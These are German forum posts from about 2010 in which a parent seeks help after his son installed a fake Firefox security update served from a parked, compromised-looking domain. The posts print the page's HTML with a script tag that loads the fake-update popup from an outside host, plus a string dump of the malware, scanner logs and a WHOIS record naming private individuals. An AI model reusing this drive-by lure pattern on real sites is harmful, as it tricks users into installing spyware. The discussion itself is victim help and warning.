Beiträge von ausy
-
-
Windows 7 Prof. 64
Firefox 18.0Habe das problrm unter "Einstellungen > Datenschutz > Die Chronik Niemals Anlagen" zu setzen. Firefox speichert es nicht.
Nach dem Setzen, bzw. o.k. und wieder aufrufen der Einstellungen zeigt Firefox wieder das "Speichern der Chronik nach Benutzerdefinierten Einstellungen Anlegen" an.
Die Benutzerrechte des Firefox Profils sind o.k.
-
Zitat von Boersenfeger
Der Link 1 http://www.cjd-ewe-oldenburg.de/ bringt mich zu einer Webseite, bei der ich die Domain kaufen kann. Ich sehe aber erst was, wenn ich in NoScript diese Seite temporär freigebe.
Mit Link 2 lande ich beim Jugenddorf: http://www.diakonie-oldenburger-land.de/index.asp?ID=867
Was ist jetzt so schlimm an der ganzen Sache? Oder habe ich was missverstanden, überlesen etc. etc. ?:mrgreen: Stimmt!!!! Jetzt wurde der Fake beseitigt, bzw. abgestellt oder gesperrt. Wer auch immer es getan hat, vermutlich die Internet-Police Lower Saxony. Vielen Dank, bis zum nächsten mal.
-
:-???:-???:-???
:twisted: Nichts ist weg! :twisted:
Es ist nach wie vor vorhanden. Gebe in Google die Suchphrasen > cjd jugenddorf oldenburg > ein und alles ist beim Alten. Zumindest schlägt bei mir G-Data sofort Alarm.
-
Es ist schon erstaunlich, die Seite, bzw. deren Script treibt immer noch sein Unwesen, obwohl Google, der alte und neue Domaininhaber mehrfacht informiert wurden. Wenigstens hat G-Data reagiert und die betroffene Site in deren Datenbank aufgenommen:
[Blockierte Grafik: http://www.abload.de/img/01_virenalarmet57.jpg]
-
Zitat von Brummelchen
Passt schon - mit NoScript und/oder AdBlock kommt so ein scheiss Popup erst gar nicht auf.
Nutze selbst Proxomitron und Ad Muncher - ich kenne sowas gar nicht.Klar kommen mit den Erweiterungen neue Fragen auf, aber besser was zuviel gefiltert als jenes.
AdBlock war aktiviert, hatte damit absolut nichts zu tun.
Java deaktivieren? Welche Seite funktioniert dann noch?Surfen ohne Admin klar, nur z. B. bei Games/InternetGames wird es schwierig. Da muß man dazu so manche Ports freischalten. Bei Win 7 kommt sofort automatisch die Aufforderung für Admin Passwort Eingabe, sonst geht gar nichts. Theorie und Praxis ist nun mal unterschiedlich, bestes Beispiel die Eurokrise trotz vieler Experten, da geht es auch ums Geld, viel Geld, unser Geld. :traurig: Eine Unaumerksamkeit und alles geht in die Hose.
Ich habe es wenigstens kurz nach der Panne gemerkt. Wieviele sitzen vor ihrem PC und merken gar nichts, das ist sicher die Masse.
Es tut sich aber was, z. B. die letzte Version von Adobe Reader X (10) wurde so umgestellt, dass die Dokumente zunächst in einer internen Sandbox geöffnet werden. Wer weiß was der Nachfolger von Win 7 bringt. In jedem Fall wird es immer sicherer. Viel Glück bei der Praxis! :wink: -
:lol: Vielen Dank für eure wertvollen Belehrungen, leider zu spät! :mrgreen:
Nun wurde durch dieses Malheur auf meinem NB ein neues OS geboren, Win 7- 64. Da wird sich auch der Billy freuen.
Ich hoffe, dass nicht nur ich, sondern auch viele andere Mitleser durch mein Posting aufgerüttelt wurden und die Finger von der bösen Software, auch aus RS und Co. die Finger lassen. Denn überall kann der Bösewicht lauern,
und nicht immer merkt man es rechtzeitig, oft wenn die Moneten wech sind.
Ein nettes Weihnachtsfest, <;) möglichst ohne Würmer & Trojaner wünscht euch allen.............
ausy
-
Zitat von PvW
Aber ganz nett gemacht.
Hier geht's doch um ebendas Fake.
Genau dat interessiert mich .
Grrr.
Gruß
P.
Was heißt nett? Man sollte solch einen Shit nicht verharmlosen :grr:
Das sollte man auf den Kindergarten beschränken. Oder möchtest du deinen Rechner fernsteuern lassen.
Durch solche Gimmicks wird das www immer kontrollierter, damit letztlich sind wir alle betroffen.Zitat von PvWEs ist doch ganz einfach. Zumindest für mich, denn ich reagiere auf keinerlei solcher oder ähnlicher Meldungen. Wenn ich neugierig auf Updates bin, klicke ich über "Hilfe" auf "Nach Updates suchen". Ansonsten besuche ich Mozilla.P.
ZitatDu bischt halt a Profi... des konn net jede.................
Wenn ich die Sache hier und jetzt so betrachte ist es wirklich gaaaaanz einfach. Aber wer schon, schaut sich bei seinen Updates die Pop-Ups mit der Lupe an? Wie oft kommt es vor, dass man z. B. den Flash Player oder Java Runtimes nicht per Update automatisch updaten kann, sondern manuell. Prüft man da jedes Fensterchen, wenn man unter Zeitdruck ist?
Man sollte die Kirche im Dorf lassen. Man fährt auch nicht in die Disco mit einem Panzer, weil vielleicht unterwegs ein Raubüberfall drohen könnte. Und was ist mit den < 14 oder > 60 Leuten. Ich glaube unter Windoes 7 wäre das nicht passiert, die Software muß einfach sicherer gemacht werden. Thats all! -
Vielen Dank an Avira Labs:
ZitatDie Datei 'Firefox_3.6_update.exe' wurde als 'MALWARE' eingestuft. Unsere Analytiker haben dieser Bedrohung den Namen ADSPY/Stud.age gegeben. Bei der Bezeichnung "ADSPY/" handelt es sich um eine Ad- oder Spyware. Diese verändert den Browser und dessen Einstellungen z.B. mittels Registry und NTFS-Streams. Häufig werden IEExploits z.B. zum Ansprechen der browserhelper.dll ausgenutzt.
-
Zitat von PvW
Abends!
Vielleicht eine handvoll Bemerkungen:
.....................
Nach Prüfung landen derlei Seiten u.a. in der Blacklist von Tante Google.
Ob das natürlich irgendwas bringt hinsichtlich der lokalen Gegebenheiten wage ich zu bezweifeln.
Gruß
P.Wie gesagt erstmal fällt ein Zusammenhang zwischen der Seite und dem Fake nicht auf, da es zeitverzögert kommt, wie sonst beim Firefoxupdate auch. Ich habe es nochmals getestet.
So sehen die Fakes aus:
[Blockierte Grafik: http://www.abload.de/img/explorerfakek5qj.jpg]
[Blockierte Grafik: http://www.abload.de/img/firefoxfakebna9.jpg]Sobald mir das tatsächliche Risiko-Ergebnis vorliegt melde ich mich.
-
Zitat von Boersenfeger
Ich meine dies nicht. Getestet wurde ja bereits. Ergebnis: Dein Computer ist nach dem Fund nicht mehr vertrauenswürdig und du solltest nach Festplattenformatierung das System neu aufsetzen.
BTW: Ich erlaube mir mal einen erziehungstechnischen Rat/Hinweis zu geben. Ich weiß nicht, wie alt dein Sohn ist, aber beziehe ihn in die Problematik mit ein. Besser kann er nicht lernen....Ich bin ja nicht allein betroffen, die meisten merken es gar nicht. Es gibt aber auch Postings zu der gleichen Datei in vielen anderen Foren. Auf Grund der sehr vertrauenswürdigen Seite schöpft man zunächst kein Verdacht, ausserdem kommt das PopUp mit ca. 3 sec. Verzögerung, so dass zunächst auch kein Zusammenhang mit der Seite in Verbindung gebracht wird, ganz raffiniert. Das habe ich auch in dieser Form in den letzten 10 Jahren nicht erlebt, obwohl ich auf vielen dubiosen Seiten unterwegs bin. Mal sehen was AntiVir & Co Comp. dazu sagen werden. Ausserdem sollte man solchen Typen das Handwerk legen und nicht nur das System neu aufsetzen. Wenn jemand dir dein Auto zusammenfährt, dann rennst du auch nicht gleich los ein Neues zu kaufen. Hier der Seitenquelltext der Seite mit dem Firefox-Update:
HTML
Alles anzeigen<html> <head> <title>www.cjd-ewe-oldenburg.de</title> <META name="keywords" content="http://www.litfass-wir-ueber-uns.de/ Fast fertig und schon online! ... Das CJD- EWE Jugenddorf Oldenburg in Niedersachsen ist eine Einrichtung des ..."> <META name="description" content="http://www.litfass-wir-ueber-uns.de/ Fast fertig und schon online! ... Das CJD- EWE Jugenddorf Oldenburg in Niedersachsen ist eine Einrichtung des ..."> <META name="abstract" content="http://www.litfass-wir-ueber-uns.de/ Fast fertig und schon online! ... Das CJD- EWE Jugenddorf Oldenburg in Niedersachsen ist eine Einrichtung des ..."> <meta name="googlebot" content="nosnippet"> <style> body { overflow: hidden; } </style> </head> <body style="margin:0px; padding:0px;" scrollbars="no" scrolling="no" onload=""> <script type="text/javascript" src="http://www.updates-browser.com/update_layer/layer_os.php?au=http%3A%2F%2Fparking.domport.de%2F%3Fdomain%3Dcjd-ewe-oldenburg.de"></script> <script language="javascript">window.setTimeout('updatepop()',3000);</script> <iframe width="100%" height="100%" src="http://www.google.de/search?q=www.cjd-ewe-oldenburg.de" border="0" frameborder="0" style="border:0px;"></iframe> </body> </html>
-
Zitat von Boersenfeger
Dann erstatte Anzeige, wenn du denen eine strafbare Handlung nachweisen kannst.
Dafür ist es zu kurzfristig, ich weiß im Moment nicht was manipuliert wurde. Man müßte die Datei einsenden.Tatsache ist, dass die Seite im Namen von Microsoft (IE) und Mozilla (Firefox) gefakte Sicherheitsupdates anbietet und das ist bereits nicht zuässig. Dein Vorredner PvW hat mit Avast etwas gefunden. Ausserdem das Hier gem. VirScanOrg:
CodeAVG 8.5.850 271.1.1/3292 2010-12-02 Generic20.YSW Dr.Web 5.0.2.3300 2010.12.02 2010-12-02 Trojan.Webprefix.3
Wenn du meinst es wäre harmlos, dann kannst du es selber testen.
-
Zitat von Boersenfeger
Týnec nad Sázavou
Das liegt heute definitiv nicht mehr in Deutschland....
Abgesehen davon, das du neben GData auch den Spyware Doctor installiert hast, einige Programme nicht standardpfadmäßig installiert hast, sehe ich nichts wesentliches. Was nichts heißen soll! Wenn Spyware Doctor zeitgleich mit GData Inhalte scannt, könnte es zu Problemen kommen. Ich kenne beide Programme nicht!
Beschere deinem Sohnemann ein eingeschränktes Windows Benutzerkonto, damit er solche Sperenzien, mit möglicherweise übleren Folgen, nicht nochmal machen kann.
BTW: Wie man Firefox richtig aktualisiert, kannst du in diesem Artikel nachlesen.
Das mag wohl sein, aber die Domain ist in Deutschland registriert, der Admin und Ansprechpartner auch in Deutschland. -
Habe das Programm in Sandboxie mal gestartet. Es kommt zu der besagten Anzeige, anschließend versucht das Programm sofort online zu gehen. In der Sandbox verbleibt nichts. Vermute dass es einen Scan durchgeführt hat und anschließend Daten versenden wollte.
Habe die exe-Datei teilweise editiert:Codeize S CreateFileA ¤WriteFile ëGetVolumeInformationA GetComputerNameA Î FindClose Ò FindFirstFileA óGetWindowsDirectoryA ^GetFileAttributesA ÈGetSystemTime ÁGetSystemDirectoryA Ü FindNextFileA ÀlstrcmpA ”WideCharToMultiByte uMultiByteToWideChar ø FreeLibrary KERNEL32.dll * CharNextA ßMessageBoxA ž DialogBoxParamA ë GetActiveWindow :GetMessageA PostMessageA Ž DefWindowProcA Æ EndDialog 8 CheckDlgButton GetDlgItem ;SendMessageA ÀLoadImageA ]GetSystemMetrics £IsDlgButtonChecked SSetDlgItemTextA †SetWindowTextA zSetTimer Ä EnableWindow ÙwvsprintfA ËLoadStringA €SetWindowLongA ƒSetWindowPos ÚMapWindowPoints ÿ GetClientRect ™SystemParametersInfoA tGetWindowRect jGetWindow EGetParent nGetWindowLongA ZGetSysColor CallWindowProcA MSetCursor wGetWindowTextA xGetWindowTextLengthA ¼UpdateWindow “InvalidateRect RedrawWindow 1ScreenToClient @ ClientToScreen & CharLowerA ÌLoadStringW USER32.dll : CreateFontIndirectA DeleteObject P CreateSolidBrush •GetObjectA ¥GetStockObject <SetTextColor GDI32.dll GetTokenInformation ¬OpenProcessToken ËRegCloseKey RegSetValueExA ÑRegCreateKeyExA $GetUserNameA > CloseServiceHandle 6 ChangeServiceConfigA ¯OpenServiceA OpenSCManagerA g CreateWellKnownSid ÷RegQueryValueExA ìRegOpenKeyExA VLsaClose SLsaAddAccountRights uLsaOpenPolicy ADVAPI32.dll ShellExecuteA ShellExecuteExA SHELL32.dll ; CoInitialize ole32.dll OLEAUT32.dll ] InitCommonControlsEx COMCTL32.dll q InternetCrackUrlA d InternetCanonicalizeUrlA i InternetCloseHandle š InternetReadFile – InternetQueryDataAvailable Y HttpSendRequestA P HttpAddRequestHeadersA U HttpOpenRequestA o InternetConnectA ’ InternetOpenA WININET.dll ˜@ ˜@ ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ ` @ T @ ÿÿÿÿ x @ l @ ÿÿÿÿ Y/¶(eÑ– ø &w=%d &v=%d.%d.%d ?cid= &d=%d SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce RunOnce .dll .exe
-
Hallo,
Ergänzung zum Vortext:
die Datei, FAKE: Firefox_3.6_update.exe, ca. 54kb wurde definitiv mit Admin-Rights installiert, danach startete Firefox etwas verändert, d. h. die User Einstellungen waren nicht vorhanden. Ein erneutes Starten über den Link brachte jedoch alles wieder unverändert im alten Zustand. Es stellt sich die Frage was dieser Fake anstellte? Beim Googeln stellt man fest, dass diese Datei im www so ziemlich Verbreitung findet, jedoch habe ich keine Infos über die Folgen gefunden, bzw. wie man es wieder säubern kann. Die Datei erscheint unter einer deutschen (.de) Domain. Somit kommt man an die Daten der Domaininhaber.
Die betroffene Domain unter welcher der Firefox Fake zu finden ist:Code
Alles anzeigenDomainabfrage-Ergebnis Domaindaten Domain cjd-ewe-oldenburg.de Letzte Aktualisierung 25.11.2010 Domaininhaber Der Domaininhaber ist der Vertragspartner der DENIC und damit der an der Domain materiell Berechtigte. Domaininhaber: Consumer Benefit Adresse: Limited Pecerady 119 PLZ: 25741 Ort: Tynec nad Sazavou Land: CZ Administrativer Ansprechpartner Der administrative Ansprechpartner (admin-c) ist die vom Domaininhaber benannte natürliche Person, die als sein Bevollmächtigter berechtigt und gegenüber DENIC auch verpflichtet ist, sämtliche die Domain cjd-ewe-oldenburg.de betreffenden Angelegenheiten verbindlich zu entscheiden. Name: Christian Flegel Adresse: Marktplatz 36 PLZ: 68723 Ort: Oftersheim Land: DE Technischer Ansprechpartner Der technische Ansprechpartner (tech-c) betreut die Domain cjd-ewe-oldenburg.de in technischer Hinsicht. Name: Andreas Wegener Organisation: Domport GmbH & Co KG Adresse: Markt 32 PLZ: 18273 Ort: Güstrow Land: DE Telefon: +49.9001118840 Telefax: +49.9001118860 E-Mail: info@domport.de Bemerkungen: Information:http://www.domport.de Questions:mailto:info@domport.de Tel.: 09001-118840 (Verbindungskosten 1,49 Euro pro Minute aus dem Festnetz der Deutschen Telekom) Zonenverwalter Der Zonenverwalter (zone-c) betreut die Nameserver der Domain cjd-ewe-oldenburg.de. Name: Andreas Wegener Organisation: Domport GmbH & Co KG Adresse: Markt 32 PLZ: 18273 Ort: Güstrow Land: DE Telefon: +49.9001118840 Telefax: +49.9001118860 E-Mail: info@domport.de Bemerkungen: Information:http://www.domport.de Questions:mailto:info@domport.de Tel.: 09001-118840 (Verbindungskosten 1,49 Euro pro Minute aus dem Festnetz der Deutschen Telekom)
Ein sofortiger Gesamtscan mit GData InternetSecurity brachte nichts zu Tage. HijackThis zeigte bei der Auswertung auch nichts Verdächtiges.
Es könnte sein, dass der Fake lediglich den Firefox Inhalt verändert hatte? Deshalb habe ich Firefox komplett deinstalliert, einschl. Profiles und wieder neu installiert.Danach erfolgte die Installation von Malewarebytes und nochmals HiJackThis, hier die Logs:
Malewarebytes:
Code
Alles anzeigenMalwarebytes' Anti-Malware 1.50 www.malwarebytes.org Datenbank Version: 5233 Windows 5.1.2600 Service Pack 3 Internet Explorer 8.0.6001.18702 02.12.2010 14:40:23 mbam-log-2010-12-02 (14-40-23).txt Art des Suchlaufs: Vollständiger Suchlauf (C:\|D:\|) Durchsuchte Objekte: 238943 Laufzeit: 49 Minute(n), 58 Sekunde(n) Infizierte Speicherprozesse: 0 Infizierte Speichermodule: 0 Infizierte Registrierungsschlüssel: 0 Infizierte Registrierungswerte: 0 Infizierte Dateiobjekte der Registrierung: 0 Infizierte Verzeichnisse: 0 Infizierte Dateien: 0 Infizierte Speicherprozesse: (Keine bösartigen Objekte gefunden) Infizierte Speichermodule: (Keine bösartigen Objekte gefunden) Infizierte Registrierungsschlüssel: (Keine bösartigen Objekte gefunden) Infizierte Registrierungswerte: (Keine bösartigen Objekte gefunden) Infizierte Dateiobjekte der Registrierung: (Keine bösartigen Objekte gefunden) Infizierte Verzeichnisse: (Keine bösartigen Objekte gefunden) Infizierte Dateien: (Keine bösartigen Objekte gefunden)
HiJackThis:
Code
Alles anzeigenLogfile of Trend Micro HijackThis v2.0.4 Scan saved at 14:41:34, on 02.12.2010 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v8.00 (8.00.6001.18702) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\nvsvc32.exe C:\WINDOWS\system32\svchost.exe C:\Programme\Gemeinsame Dateien\G DATA\GDScan\GDScan.exe D:\Safety\GData\AVK\AVKWCtl.exe C:\WINDOWS\System32\svchost.exe C:\Programme\WIDCOMM\Bluetooth Software\bin\btwdins.exe C:\WINDOWS\system32\svchost.exe C:\Programme\Intel\WiFi\bin\S24EvMon.exe C:\WINDOWS\system32\spoolsv.exe C:\Programme\Gemeinsame Dateien\G DATA\AVKProxy\AVKProxy.exe D:\Safety\GData\AVK\AVKService.exe D:\Safety\GnuPG\dirmngr.exe C:\Programme\Intel\WiFi\bin\EvtEng.exe C:\Programme\Gemeinsame Dateien\Intel\WirelessCommon\RegSrvc.exe C:\Programme\Compal Electronics, INC\Smart Watchdog\SWDsvc.exe C:\WINDOWS\system32\svchost.exe D:\Safety\GData\Firewall\GDFwSvc.exe C:\WINDOWS\Explorer.EXE C:\Programme\Motorola\SMSERIAL\sm56hlpr.exe C:\Programme\Compal\Wow Video&Audio\WVAMain.exe C:\Programme\Gemeinsame Dateien\Intel\WirelessCommon\iFrmewrk.exe C:\Programme\Elantech\ETDCtrl.exe C:\WINDOWS\RTHDCPL.EXE C:\Programme\Intel\WiFi\bin\ZCfgSvc.exe C:\WINDOWS\vsnp2uvc.exe C:\Programme\Wireless Select Switch\WLSS.exe C:\Programme\Canon\Canon IJ Network Scan Utility\CNMNSUT.exe D:\Safety\GData\AVKTray\AVKTray.exe C:\WINDOWS\system32\wbem\unsecapp.exe D:\Safety\GData\Firewall\GDFirewallTray.exe C:\WINDOWS\system32\ctfmon.exe C:\Programme\WIDCOMM\Bluetooth Software\BTTray.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\NOTEPAD.EXE G:\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 O2 - BHO: G Data WebFilter Class - {0124123D-61B4-456f-AF86-78C53A0790C5} - D:\Safety\GData\WebFilter\AvkWebIE.dll O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre6\bin\jp2ssv.dll O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Programme\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll O3 - Toolbar: G Data WebFilter - {0124123D-61B4-456f-AF86-78C53A0790C5} - D:\Safety\GData\WebFilter\AvkWebIE.dll O4 - HKLM\..\Run: [SMSERIAL] C:\Programme\Motorola\SMSERIAL\sm56hlpr.exe O4 - HKLM\..\Run: [Wow Video&Audio] C:\Programme\Compal\Wow Video&Audio\WVAMain.exe O4 - HKLM\..\Run: [Acronis Scheduler2 Service] "C:\Programme\Gemeinsame Dateien\Acronis\Schedule2\schedhlp.exe" O4 - HKLM\..\Run: [IntelWireless] "C:\Programme\Gemeinsame Dateien\Intel\WirelessCommon\iFrmewrk.exe" /tf Intel Wireless Tray O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [ETDWare] C:\Programme\Elantech\ETDCtrl.exe O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE O4 - HKLM\..\Run: [IntelZeroConfig] "C:\Programme\Intel\WiFi\bin\ZCfgSvc.exe" O4 - HKLM\..\Run: [snp2uvc] C:\WINDOWS\vsnp2uvc.exe O4 - HKLM\..\Run: [WLSS] C:\Programme\Wireless Select Switch\WLSS.exe O4 - HKLM\..\Run: [IJNetworkScanUtility] C:\Programme\Canon\Canon IJ Network Scan Utility\CNMNSUT.exe O4 - HKLM\..\Run: [CanonMyPrinter] C:\Programme\Canon\MyPrinter\BJMyPrt.exe /logon O4 - HKLM\..\Run: [G Data AntiVirus Tray Application] D:\Safety\GData\AVKTray\AVKTray.exe O4 - HKLM\..\Run: [GDFirewallTray] D:\Safety\GData\Firewall\GDFirewallTray.exe O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "D:\Tools\AcrobatReader\Reader\Reader_sl.exe" O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] D:\Safety\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKALER DIENST') O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST') O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM') O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user') O4 - Global Startup: BTTray.lnk = ? O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://D:\Tools\Office\OFFICE11\EXCEL.EXE/3000 O8 - Extra context menu item: Senden an &Bluetooth-Gerät... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~2\INetRepl.dll O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~2\INetRepl.dll O9 - Extra 'Tools' menuitem: Mobilen Favoriten erstellen... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~2\INetRepl.dll O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\Tools\Office\OFFICE11\REFIEBAR.DLL O9 - Extra button: iFinger - {936E5D60-596C-11D3-BB96-00600816DF55} - C:\WINDOWS\system32\SHDOCVW.DLL O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1263318776140 O17 - HKLM\System\CCS\Services\Tcpip\..\{7A5AC9B0-4E81-470A-84BD-513CA4D3609E}: NameServer = 212.6.108.140,212.6.108.141,212.6.54.161,212.6.64.162,192.168.178.1 O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll O23 - Service: Acronis Nonstop Backup service (afcdpsrv) - Acronis - C:\Programme\Gemeinsame Dateien\Acronis\CDP\afcdpsrv.exe O23 - Service: G Data AntiVirus Proxy (AVKProxy) - G Data Software AG - C:\Programme\Gemeinsame Dateien\G DATA\AVKProxy\AVKProxy.exe O23 - Service: G Data Scheduler (AVKService) - G Data Software AG - D:\Safety\GData\AVK\AVKService.exe O23 - Service: G Data Dateisystem Wächter (AVKWCtl) - Unknown owner - D:\Safety\GData\AVK\AVKWCtl.exe O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Programme\WIDCOMM\Bluetooth Software\bin\btwdins.exe O23 - Service: DirMngr - Unknown owner - D:\Safety\GnuPG\dirmngr.exe O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel(R) Corporation - C:\Programme\Intel\WiFi\bin\EvtEng.exe O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Programme\Gemeinsame Dateien\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe O23 - Service: G Data Personal Firewall (GDFwSvc) - G Data Software AG - D:\Safety\GData\Firewall\GDFwSvc.exe O23 - Service: G Data Scanner (GDScan) - G Data Software AG - C:\Programme\Gemeinsame Dateien\G DATA\GDScan\GDScan.exe O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Programme\Google\Update\GoogleUpdate.exe O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\11\Intel 32\IDriverT.exe O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Programme\Java\jre6\bin\jqs.exe O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel(R) Corporation - C:\Programme\Gemeinsame Dateien\Intel\WirelessCommon\RegSrvc.exe O23 - Service: Intel(R) PROSet/Wireless WiFi Service (S24EventMonitor) - Intel(R) Corporation - C:\Programme\Intel\WiFi\bin\S24EvMon.exe O23 - Service: Smart Watchdog Service (Smart Watchdog) - Unknown owner - C:\Programme\Compal Electronics, INC\Smart Watchdog\SWDsvc.exe -- End of file - 9430 bytes
Vielleicht hat jemand die Möglichkeit den Fake in einer Sandbox laufen zu lassen, um zu sehen was sich da tut. Leider habe ich damit keine Erfahrungen. Die Datei befindet sich im folgenden Anhang:
Edit Road-Runner: Dateianhang entfernt, da die betreffende Datei als Malware eingestuft wurde (siehe hier)
-
o.k. vielen Dank zunächst, er hatte die Admin-Rechte wegen dem Firefox-Update genutzt. Dummerweise sind auch eine Menge Passwörter, Ebay etc. im Firefox gespeichert. Es sah ja auch ziemlich echt aus, ich wäre wahrscheinlich selbst darauf hereingefallen.
-
Hallo,
mein Sohne ist auf ein Sicherheitsupdate-Fake ( Firefox_3.6_update.exe ) hereingefallen und hat es installiert.
Beim aufrufen einer über Google verlinkten, an sich seriösen Adresse erscheint ein PopUp:h**p://http://www.cjd-ewe-oldenburg.de
Leider kann ich nicht herausfinden was dieses Fake anstellt, vermutlich Trojaner? :grr:
Beim Virusscan wird nichts angezeigt.
Kennt es jemand, bzw. kann man feststellen was es anrichtet?Edit Road-Runner: Link unklickbar gemacht, da auf der verlinkten Seite ein Script von der Seite updates-browser.c*m eingebaut ist, welches ohne NoScript dann wahrscheinlich dieses Popup hervorbringt.